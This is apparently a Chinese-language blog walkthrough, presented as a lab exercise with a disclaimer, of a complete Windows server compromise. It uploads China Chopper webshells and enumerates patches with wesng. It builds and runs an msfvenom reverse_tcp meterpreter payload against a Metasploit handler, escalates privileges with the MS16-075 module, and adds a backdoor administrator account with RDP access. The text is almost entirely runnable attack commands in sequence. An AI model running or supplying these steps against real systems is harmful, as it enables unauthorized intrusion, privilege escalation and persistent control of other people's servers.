免責聲明

請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。工具來自網絡,安全性自測,如有侵權請聯系刪除。

原理圖

先在被攻擊機中上傳小馬文件,然后用菜刀連接被上傳木馬的機器

上傳大馬文件

用本機連接大馬

用大馬生成文件:systeminfo > C:\www\KingCMS\q.txt

使用wesng進行補丁篩選(python wes.py .txt -o vuln.csv)

連接云服務器,并下載msf:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

生成反彈shell的exe文件,IP為使用msf的主機的ip,監聽端口為5555,通過菜刀上傳到win server(msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=5555 -f exe > q.exe)

安裝rz和sz命令(yum install lrzsz)

輸入sz q.exe,將.exe文件下載至本機

運行msf :msfconsole;

msf設置端口監聽(use /exploit/multi/handler>)

設置payload(set payload windows/meterpreter/reverse_tcp)

查看配置(show options)

設置監聽端口(set lport 5555)

設置監聽ip,全部監聽(set lhost 0.0.0.0)

最后執行開始監聽(exploit)

菜刀中執行exe文件,打開虛擬終端即可執行

getuid(查看用戶);background(保存會話退出)

msf提權

MSF設置payload (ms16-075)

search ms16-075

use 1

set payload windows/x64/meterpreter/reverse_tcp

設置會話session,看剛剛掛起是session的編號 (set session 2)

設置payload參數(端口換個6666,lhost換成攻擊機的IP)

exploit執行,成功即為提權成功

輸入shell,進行如下操作:

net user username password /add 創建用戶

net localgroup "Remote Desktop Users" username /add 將創建的用戶添加到遠程連接組

net localgroup Administrators username /add 將創建的用戶添加到管理員組

然后即可通過遠程登錄進入

本機進行遠程連接

至此實驗成功!